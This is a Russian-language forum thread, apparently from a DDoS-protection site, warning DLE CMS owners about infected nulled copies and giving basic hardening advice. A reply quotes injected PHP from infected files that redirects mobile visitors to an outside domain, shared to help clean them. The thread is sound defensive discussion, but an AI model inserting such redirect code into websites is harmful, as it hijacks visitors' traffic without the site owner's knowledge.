• Форум посвящен самостоятельной (бесплатной) защите от ддос атак.
    Есть мануалы по настройке сервера от Ddos для сисадминов и готовые инструменты от ддос-атак для вебмастеров.

    Простое, эффективное, точное и проверенное бесплатное решение от мощных ддос-атак: PHP скрипт + Cloudflare, с панелью управления.

Уязвимость в сайтах на движке DLE (DataLife Engine)

admin

admin

Администратор
Администрация
#1
Движок DLE - очень популярный движок для новостных блогов. Движок платный - его стоимость на данный момент составляет 2190 р. за базовую лицензию. Если же вы захотели сэкономить и скачали движок не с официального сайта - он уже может быть завирусован. Это касается и других популярных движков - бесплатные (нуленые) версии уже могут содержать вредоносный код на момент скачивания. Но, даже если вы скачали движок с официального сайта, нужно не забывать переодически его обновлять, т.к. хакеры постоянно находят новые уязвимости в популярных движках.

Чем же грозит взлом новостного сайта? Во-первых, хакер может загрузить на сайт вирус, на что очень быстро отреагируют поисковые системы, пометив ваш сайт, как небезопасный, что сильно скажется на посещаемости. Потом, через уязвимый сайт хакер может заразить остальные сайты, находящиеся на том же хостинге. Поэтому рекомендуется использовать для важных сайтов виртуальные или выделенные сервера с возможностью задавать для каждого сайта отдельного пользователя. И, наконец, хакер может просто удалить всю вашу инфу, поэтому не забывайте включать резервное копирование данных на сервере.

Итак, чтобы максимально обезопасить себя от взлома или его последствий:
1) Скачивайте движок только с официального сайта. Разумеется, придется заплатить, но так безопаснее.
2) Не забывайте обновлять движок по мере выхода новых версий.
3) Будьте осторожны при установки дополнительных модулей (расширений) на сайт - они также могут содержать уязвимости. Возможно, модули тоже придется обновлять.
4) Создавайте на сервере отдельных пользователей для каждого сайта и для каждой базы данных.
5) Включите на сервере резервное копирование данных сайта.


Обзор уязвимостей DLE: http://forum.antichat.ru/thread52195.html
 
Последнее редактирование:
Слон

Слон

New Member
#2
Я так понимаю, блоги тоже могут на этом движке работать, а значит, это актуально для всех сайтов, раскручивающщих своих клиентов возможностью "излить порывы творческой души" ,а проще - поп..ть.
Нашлось только рукописная чистка кода зараженных файлов:

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],”iPhone”);$android = strpos($_SERVER['HTTP_USER_AGENT'],”Android”);$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],”webOS”);$berry = strpos($_SERVER['HTTP_USER_AGENT'],”BlackBerry”);$ipod = strpos($_SERVER['HTTP_USER_AGENT'],”iPod”);if ($iphone || $android || $palmpre || $ipod || $berry === true) {header(‘Location: http://statuses.ws/’);


Только работать надо в нормальном блокноте - Notepad++ - качать здесь: http://notepad-plus-plus.org/download/v6.6.7.html
 
Сверху